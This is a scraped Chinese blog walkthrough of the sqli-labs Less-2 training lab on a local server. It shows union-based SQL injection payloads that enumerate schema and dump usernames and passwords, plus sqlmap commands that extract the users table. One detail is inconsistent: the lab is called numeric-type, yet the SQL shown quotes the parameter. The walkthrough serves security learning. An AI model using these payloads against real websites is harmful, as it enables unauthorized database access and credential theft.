当前位置: 首页 > news >正文

蓝德网站建设用凡科建设的网站安全吗

蓝德网站建设,用凡科建设的网站安全吗,软件外包网,网络营销方案策划案例1. 思路🚀 本关的SQL语句为: $sql"SELECT * FROM users WHERE id$id LIMIT 0,1";注入类型:数值型提示:参数id无需考虑闭合问题,相对简单 2. 手工注入步骤🎯 我的地址栏是:http://l…

1. 思路🚀

本关的SQL语句为:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  • 注入类型:数值型
  • 提示:参数id无需考虑闭合问题,相对简单

在这里插入图片描述


2. 手工注入步骤🎯

我的地址栏是:http://localhost:8081/Less-2/,只需要将下面的sql语句粘贴即可。

2.1. 正常请求⚡

?id=1

在这里插入图片描述

说明:测试回显情况


2.2. 判断字段数⚡

?id=1 order by 4
  • order by 4:探测字段数(报错说明字段数=3)

在这里插入图片描述
本关卡在sql语句后是不需要加--+注释符,是否加--+注释符详细如下:

2.2.1. 必须使用--+的情况
场景特征示例必要性分析
URL参数注入?id=1'--+URL中的空格会被编码,+确保注释生效
闭合单引号admin'--+避免后续SQL语法错误
过滤空格环境1'/**/OR/**/1=1--+WAF可能过滤空格但允许+
2.2.2. 可不使用的情况
场景特征示例原因分析
数字型注入?id=1 OR 1=1无需闭合引号
报错注入?id=1 AND updatexml(1,concat(0x7e,(SELECT@@version)),1)语句自包含无需截断
POST表单注入username=admin'--表单数据不涉及URL编码

2.3. 确定回显位⚡

?id=-1 union select 1,2,3
  • -1:使前查询无结果
  • union select:联合查询回显位

在这里插入图片描述


2.4. 获取基础信息⚡

?id=-1 union select 1,database(),user()

在这里插入图片描述


2.5. 获取表名⚡

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security'

在这里插入图片描述


2.6. 获取字段⚡

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'

在这里插入图片描述


2.7. 获取数据⚡

?id=-1 union select 1,group_concat(username),group_concat(password) from users

在这里插入图片描述


2.8. 参数汇总表⭐

参数作用示例
order by判断字段数order by 4
union select联合查询union select 1,2,3
group_concat()合并结果group_concat(table_name)
information_schema系统数据库from information_schema.tables
table_schema数据库名称table_schema='security'
table_name数据表名称table_name='users'
column_name字段名称group_concat(column_name)

3. SQLMap工具测试🎯

url地址换成自己的,后面一定要加上id=1,比如:http://localhost:8081/Less-2/?id=1

# 检测注入点
python sqlmap.py -u "http://localhost:8081/Less-2/?id=1" --batch# 爆数据库
python sqlmap.py -u "url" --dbs --batch# 爆表名
python sqlmap.py -u "url" -D security --tables --batch# 爆列名
python sqlmap.py -u "url" -D security -T users --columns --batch# 爆数据
python sqlmap.py -u "url" -D security -T users -C id,username,password --dump --batch

命令1截图:
!https://via.placeholder.com/600x300?text=SQLMap截图
命令5截图:
在这里插入图片描述

SQLMap参数表⭐

参数功能
--batch非交互模式
--dbs枚举数据库
-D指定数据库
-T指定表
-C指定列
--dump导出数据

4. 总结🏁

如有不懂,关卡1的解析更为详细,相信你会有收获,sqli-labs:Less-1关卡详细解析:https://blog.csdn.net/qq_62000508/article/details/149773926?spm=1011.2124.3001.6209

  1. 注入类型:数值型
  2. 核心步骤:判字段→找回显→爆库→爆表→爆数据
  3. 工具对比:手工注入适合学习原理,SQLMap适合快速验证

声明:本文仅用于安全学习,严禁非法测试! ❗❗❗

http://www.dtcms.com/a/439849.html

相关文章:

  • 推客分销系统开发指南:从0到1搭建多级分润体系
  • 网站建设的需求和目的自建网站三种模式
  • 希尔顿酒店网站建设的优点专业公司网站设计企业
  • 怎么设置自己的网站wordpress免费主题外贸
  • 如何查看网站seo网站质量度
  • 网站域名登陆地址查询网站开发人员的职责
  • 如何申请我的网站168分类信息发布网
  • 音乐网站界面如何保持网站中的图片
  • 建设网站报价南昌做网站的公司有哪些
  • 654.最大二叉树(二叉树算法)
  • 网站运营 策划 推广 维护网络营销方式给消费者消费行为模式带来的影响
  • 网站谷歌seo做哪些淮安做网站的公司
  • 已经有域名如何做网站内蒙古呼和浩特职业学院
  • 海沧网站建设视频网站开发php
  • 网站开发及维护招聘wordpress站点版权设置
  • 网站建设的合同书网站次年续费
  • 什么网站可以做数据调查问卷网站备案后 换服务器
  • 最新做做网站免费2014 个人网站备案
  • cpa怎么做网站wordpress-saas
  • Cliproxy代理IP:解锁Reddit多账号运营的安全与效率密码
  • 个人房产信息查询网站phpcms 中英文网站
  • 营销型网站及原因有哪些方面宣传册模板
  • 安徽网站建设优化推广企业网站的内容模块
  • 湖南省水利水电建设工程学校网站wordpress文章背景
  • 网站建设公司包括哪些板块广州免费孕检
  • 构建AI智能体:五十二、反应式智能体:AI世界的条件反射,真的可以又快又稳
  • 凡科网做网站贵吗刚刚发生了一件大事
  • [创业之路-671]:半导体暗场(Darkfield)无图形检测与明场(Brightfield)有图形检测的光源技术对比
  • 动易门户网站价格猪八戒网做网站如何
  • 学术会议网站怎么做wordpress 海 主题